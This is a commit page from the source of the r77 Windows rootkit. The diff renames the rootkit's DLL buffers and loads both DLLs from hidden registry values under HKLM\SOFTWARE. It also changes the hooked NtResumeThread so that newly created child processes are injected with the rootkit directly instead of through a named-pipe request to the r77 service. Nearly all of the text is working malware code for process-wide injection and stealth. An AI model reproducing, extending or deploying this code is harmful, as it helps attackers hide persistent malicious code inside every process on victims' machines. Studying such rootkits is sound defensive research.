Skip to content

Commit 17c5ba9

Browse files
author
Martin Fischer
committed
NtResumtThread: Inject directly if possible
1 parent 3abeba8 commit 17c5ba9

File tree

6 files changed

+101
-39
lines changed

6 files changed

+101
-39
lines changed

Service/Service.c

+14-14
Original file line numberDiff line numberDiff line change
@@ -50,14 +50,14 @@ BOOL InitializeService()
5050
// Get both r77 DLL's.
5151
HKEY key;
5252
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_QUERY_VALUE, &key) != ERROR_SUCCESS ||
53-
RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &Dll32Size) != ERROR_SUCCESS ||
54-
RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &Dll64Size) != ERROR_SUCCESS) return FALSE;
53+
RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &RootkitDll32Size) != ERROR_SUCCESS ||
54+
RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &RootkitDll64Size) != ERROR_SUCCESS) return FALSE;
5555

56-
Dll32 = NEW_ARRAY(BYTE, Dll32Size);
57-
Dll64 = NEW_ARRAY(BYTE, Dll64Size);
56+
RootkitDll32 = NEW_ARRAY(BYTE, RootkitDll32Size);
57+
RootkitDll64 = NEW_ARRAY(BYTE, RootkitDll64Size);
5858

59-
if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, Dll32, &Dll32Size) != ERROR_SUCCESS ||
60-
RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, Dll64, &Dll64Size) != ERROR_SUCCESS) return FALSE;
59+
if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, RootkitDll32, &RootkitDll32Size) != ERROR_SUCCESS ||
60+
RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, RootkitDll64, &RootkitDll64Size) != ERROR_SUCCESS) return FALSE;
6161

6262
RegCloseKey(key);
6363

@@ -132,8 +132,8 @@ VOID ChildProcessCallback(DWORD processId)
132132

133133
if (!IsInjectionPaused)
134134
{
135-
InjectDll(processId, Dll32, Dll32Size);
136-
InjectDll(processId, Dll64, Dll64Size);
135+
InjectDll(processId, RootkitDll32, RootkitDll32Size);
136+
InjectDll(processId, RootkitDll64, RootkitDll64Size);
137137
}
138138
}
139139
VOID NewProcessCallback(DWORD processId)
@@ -142,8 +142,8 @@ VOID NewProcessCallback(DWORD processId)
142142

143143
if (!IsInjectionPaused)
144144
{
145-
InjectDll(processId, Dll32, Dll32Size);
146-
InjectDll(processId, Dll64, Dll64Size);
145+
InjectDll(processId, RootkitDll32, RootkitDll32Size);
146+
InjectDll(processId, RootkitDll64, RootkitDll64Size);
147147
}
148148
}
149149
VOID ControlCallback(DWORD controlCode, HANDLE pipe)
@@ -190,8 +190,8 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
190190
DWORD bytesRead;
191191
if (ReadFile(pipe, &processId, sizeof(DWORD), &bytesRead, NULL) && bytesRead == sizeof(DWORD))
192192
{
193-
InjectDll(processId, Dll32, Dll32Size);
194-
InjectDll(processId, Dll64, Dll64Size);
193+
InjectDll(processId, RootkitDll32, RootkitDll32Size);
194+
InjectDll(processId, RootkitDll64, RootkitDll64Size);
195195
}
196196

197197
break;
@@ -206,8 +206,8 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
206206

207207
for (DWORD i = 0; i < processCount; i++)
208208
{
209-
InjectDll(processes[i], Dll32, Dll32Size);
210-
InjectDll(processes[i], Dll64, Dll64Size);
209+
InjectDll(processes[i], RootkitDll32, RootkitDll32Size);
210+
InjectDll(processes[i], RootkitDll64, RootkitDll64Size);
211211
}
212212
}
213213
break;

Service/Service.h

+5-4
Original file line numberDiff line numberDiff line change
@@ -4,19 +4,20 @@
44
/// <summary>
55
/// The 32-bit r77 DLL.
66
/// </summary>
7-
LPBYTE Dll32;
7+
LPBYTE RootkitDll32;
88
/// <summary>
99
/// The size of the 32-bit r77 DLL.
1010
/// </summary>
11-
DWORD Dll32Size;
11+
DWORD RootkitDll32Size;
1212
/// <summary>
1313
/// The 64-bit r77 DLL.
1414
/// </summary>
15-
LPBYTE Dll64;
15+
LPBYTE RootkitDll64;
1616
/// <summary>
1717
/// The size of the 64-bit r77 DLL.
1818
/// </summary>
19-
DWORD Dll64Size;
19+
DWORD RootkitDll64Size;
20+
2021
/// <summary>
2122
/// The thread that listens for notifications about created child processes.
2223
/// </summary>

r77/Hooks.c

+39-20
Original file line numberDiff line numberDiff line change
@@ -3,6 +3,7 @@
33
#include "Config.h"
44
#include "r77def.h"
55
#include "r77win.h"
6+
#include "r77process.h"
67
#include "ntdll.h"
78
#include "detours.h"
89
#include <Shlwapi.h>
@@ -214,38 +215,56 @@ static NTSTATUS NTAPI HookedNtResumeThread(HANDLE thread, PULONG suspendCount)
214215
// Child process hooking:
215216
// When a process is created, its parent process calls NtResumeThread to start the new process after process creation is completed.
216217
// At this point, the process is suspended and should be injected. After injection is completed, NtResumeThread should be called.
217-
// To inject the process, a connection to the r77 service is performed through a named pipe.
218-
// Because a 32-bit process can create a 64-bit child process, injection cannot be performed here.
218+
219+
// If this process is 32-bit and the new process is 64-bit:
220+
// Injection cannot be performed here. An injection request is sent to the r77 service through a named pipe.
221+
// Else:
222+
// The new process is injected directly.
219223

220224
DWORD processId = GetProcessIdOfThread(thread);
221225
if (processId != GetCurrentProcessId()) // If NtResumeThread is called on this process, it is not a child process
222226
{
223-
// Call the r77 service and pass the process ID.
224-
HANDLE pipe = CreateFileW(CHILD_PROCESS_PIPE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
225-
if (pipe != INVALID_HANDLE_VALUE)
227+
BOOL isWow64;
228+
BOOL process64Bit;
229+
if (RootkitDll32 == NULL ||
230+
RootkitDll64 == NULL ||
231+
!IsWow64Process(GetCurrentProcess(), &isWow64) ||
232+
!Is64BitProcess(processId, &process64Bit) ||
233+
isWow64 && process64Bit) // Current process is WoW, child process is x64
226234
{
227-
WRITE_CHILD_PROCESS_PIPET_HREAD_PARAMETERS parameters;
228-
parameters.PipeHandle = pipe;
229-
parameters.ProcessId = processId;
235+
// Call the r77 service and pass the process ID.
236+
HANDLE pipe = CreateFileW(CHILD_PROCESS_PIPE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
237+
if (pipe != INVALID_HANDLE_VALUE)
238+
{
239+
WRITE_CHILD_PROCESS_PIPET_HREAD_PARAMETERS parameters;
240+
parameters.PipeHandle = pipe;
241+
parameters.ProcessId = processId;
230242

231-
// In some cases, the WriteFile call to the named pipe hangs indefinitely.
232-
// This bug was introduced after injecting the r77 service into winlogon, rather than in a hollowed process.
243+
// In some cases, the WriteFile call to the named pipe hangs indefinitely.
244+
// This bug was introduced after injecting the r77 service into winlogon, rather than in a hollowed process.
233245

234-
// Therefore, we must execute this write operation in a separate thread.
235-
// If this thread does not return within a given amount of time, we must assume that it failed,
236-
// and just continue process initialization. The periodic process injection will catch this process
237-
// within less than 100ms.
246+
// Therefore, we must execute this write operation in a separate thread.
247+
// If this thread does not return within a given amount of time, we must assume that it failed,
248+
// and just continue process initialization. The periodic process injection will catch this process
249+
// within less than 100ms.
238250

239-
HANDLE thread = CreateThread(NULL, 0, WriteChildProcessPipeThread, &parameters, 0, NULL);
240-
if (thread)
241-
{
242-
if (WaitForSingleObject(thread, 500) != WAIT_OBJECT_0)
251+
HANDLE thread = CreateThread(NULL, 0, WriteChildProcessPipeThread, &parameters, 0, NULL);
252+
if (thread)
243253
{
244-
// WriteFile got stuck.
245-
TerminateThread(thread, 0);
254+
if (WaitForSingleObject(thread, 500) != WAIT_OBJECT_0)
255+
{
256+
// WriteFile got stuck.
257+
TerminateThread(thread, 0);
258+
}
246259
}
247260
}
248261
}
262+
else
263+
{
264+
// Inject the process directly.
265+
InjectDll(processId, RootkitDll32, RootkitDll32Size);
266+
InjectDll(processId, RootkitDll64, RootkitDll64Size);
267+
}
249268
}
250269

251270
// This function returns, *after* injection is completed.

r77/Rootkit.c

+25
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,28 @@ BOOL InitializeRootkit()
2626

2727
// Attach hooks.
2828
InitializeHooks();
29+
30+
// Get both r77 DLL's.
31+
HKEY key;
32+
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_QUERY_VALUE | KEY_WOW64_64KEY, &key) == ERROR_SUCCESS &&
33+
RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &RootkitDll32Size) == ERROR_SUCCESS &&
34+
RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &RootkitDll64Size) == ERROR_SUCCESS)
35+
{
36+
LPBYTE dll32 = NEW_ARRAY(BYTE, RootkitDll32Size);
37+
LPBYTE dll64 = NEW_ARRAY(BYTE, RootkitDll64Size);
38+
39+
if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, dll32, &RootkitDll32Size) == ERROR_SUCCESS &&
40+
RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, dll64, &RootkitDll64Size) == ERROR_SUCCESS)
41+
{
42+
RootkitDll32 = dll32;
43+
RootkitDll64 = dll64;
44+
}
45+
else
46+
{
47+
FREE(dll32);
48+
FREE(dll64);
49+
}
50+
}
2951
}
3052

3153
return TRUE;
@@ -44,6 +66,9 @@ VOID UninitializeRootkit()
4466

4567
// Detach hooks.
4668
UninitializeHooks();
69+
70+
FREE(RootkitDll32);
71+
FREE(RootkitDll64);
4772
}
4873
}
4974
static VOID DetachRootkit()

r77/Rootkit.h

+17
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,23 @@
22
#ifndef _ROOTKIT_H
33
#define _ROOTKIT_H
44

5+
/// <summary>
6+
/// The 32-bit r77 DLL.
7+
/// </summary>
8+
LPBYTE RootkitDll32;
9+
/// <summary>
10+
/// The size of the 32-bit r77 DLL.
11+
/// </summary>
12+
DWORD RootkitDll32Size;
13+
/// <summary>
14+
/// The 64-bit r77 DLL.
15+
/// </summary>
16+
LPBYTE RootkitDll64;
17+
/// <summary>
18+
/// The size of the 64-bit r77 DLL.
19+
/// </summary>
20+
DWORD RootkitDll64Size;
21+
522
/// <summary>
623
/// Initializes r77, writes the r77 header and installs hooks.
724
/// <para>This function returns FALSE, if r77 is already injected, or if this process is either the r77 service or a helper process, or the process starts with $77.</para>

r77api/r77win.c

+1-1
Original file line numberDiff line numberDiff line change
@@ -110,7 +110,7 @@ PWCHAR Int32ToStrW(LONG value, PWCHAR buffer)
110110

111111
BOOL Is64BitOperatingSystem()
112112
{
113-
BOOL wow64 = FALSE;
113+
BOOL wow64;
114114
return BITNESS(64) || IsWow64Process(GetCurrentProcess(), &wow64) && wow64;
115115
}
116116
BOOL IsAtLeastWindows10()

0 commit comments

Comments
 (0)